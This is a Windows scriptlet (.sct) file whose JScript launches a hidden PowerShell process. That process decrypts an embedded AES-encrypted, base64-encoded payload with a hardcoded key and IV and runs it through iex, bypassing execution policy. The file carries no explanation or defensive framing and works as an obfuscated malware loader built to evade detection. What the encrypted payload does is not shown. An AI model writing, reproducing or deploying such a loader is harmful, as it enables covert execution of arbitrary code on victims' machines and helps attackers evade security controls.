<?XML version="1.0"?>
<scriptlet>
<registration
    description="AESDecryptionExecution"
    progid="AESDecryptionExecution"
    version="1.0"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}">
    <script language="JScript">
        <![CDATA[
            try {
                var shell = new ActiveXObject("WScript.Shell");

                var psCommand = "powershell -nop -w hidden -ep bypass -Command \"";
                psCommand += "$encBytes = [Convert]::FromBase64String('CX8Fyl0SQqPqtXp/Oo1aVQ8XTIot81HiFMDfg1pJhp7YapIf2XyHrwHX36nEv/iC3x0ZP2+6VYqeuOTsXKVlcWU9bnatF" +
                             "J+wPKe2L+zkDRREmkV4xSnaaQD8wld5ALbb6n3DZmSJQbY9LQEMd6762OmnDpihi+BfEnwCgC/Jt8KD834BDPEPQ1inHBPi6eE1g7bUQ8Mkp/p8xF0SqDc" +
                             "R3w==');";
                psCommand += "$aes = [System.Security.Cryptography.Aes]::Create();";
                psCommand += "$aes.Key = $([Convert]::FromBase64String('nAYDgtfCybFs3Qpx7GqNASGiVHIhY7oiPLC7Zb+B5sA='));";
                psCommand += "$aes.IV = $([Convert]::FromBase64String('q9h/86TZSGfwlh1M78mZrA=='));";
                psCommand += "$aes.Mode = [System.Security.Cryptography.CipherMode]::CBC;";
                psCommand += "$aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;";
                psCommand += "$decryptor = $aes.CreateDecryptor();";
                psCommand += "$decBytes = $decryptor.TransformFinalBlock($encBytes, 0, $encBytes.Length);";
                psCommand += "iex $([System.Text.Encoding]::UTF8.GetString($decBytes))\"";

                shell.Run(psCommand, 0, false);
            } catch (e) {
                var shell = new ActiveXObject("WScript.Shell");
                shell.Popup("Error: " + e.message, 0, "Execution Error", 16);
            }
        ]]>
    </script>
</registration>
</scriptlet>
